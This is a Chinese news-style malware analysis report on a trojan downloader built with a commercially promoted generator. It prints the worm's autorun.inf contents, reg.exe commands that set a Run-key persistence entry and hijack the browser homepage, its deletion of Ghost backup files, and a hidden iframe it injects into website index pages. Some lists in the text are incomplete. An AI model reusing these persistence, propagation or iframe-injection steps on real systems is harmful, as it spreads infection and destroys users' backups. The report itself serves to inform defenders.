这年头,做个守法公民真不容易,昨天有个曾经做过“黑客”的朋友做的网站被DDoS了,他打算重操旧业。为非作歹的程序员也层出不穷,下面这个是昨天那个牛×下载者生成器生成的网马分析报告。那个下载器本身毒霸也可以杀。
又到大学生找工作的时候了,不晓得会有多少学生因就业问题,走到病毒开发者的队伍中去。
这是一个木马下载病毒,该病毒会删除被感染机器上的ghost备份文件,并且尝试感染脚本文件,尝试通过U盘传播把病毒本身传播出去。链接指定网址,下载其他木马程序。
1.%system%\SVSH0ST.EXE
%system%\Autorun.inf
|
1.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe,并且创建autorun.inf文件,内容如下:
[AutoRun]
open=lcg.exe
shell\open=打开(&O)
shell\open\Command=lcg.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=lcg.EXE
|
2.创建互斥量"niux"
3.运行创建进程运行下面的命令:
reg.exe
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D "
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D
C:\\WINNT\\System32\\SVSH0ST.EXE /F"
"add \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /v \"Start Page\" /t
REG_EXPAND_SZ /d /f"
"add \"HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\" /v
\"HomePage\" /t REG_DWORD /d 00000001 /f"
|
4.枚举所有当前窗口,如果发现窗口信息中含有以下字符,就关闭该窗口:
5.遍历所有的盘符,如果文件后缀名为.GHO文件(ghost备份文件),则删除该文件,如果文件名中含有以下的
INDEX.ASP
.HTM
INDEX.PHP
DEFAULT.ASP
DEFAULT.PHP
CONN.ASP
|
之一的责尝试在文件末尾插入代码:
<iframe src=http://*/test.htm width=0 height=0>< / iframe >
|
(责任编辑:李磊)
病毒作者太嚣张公然推销自动木马生成器
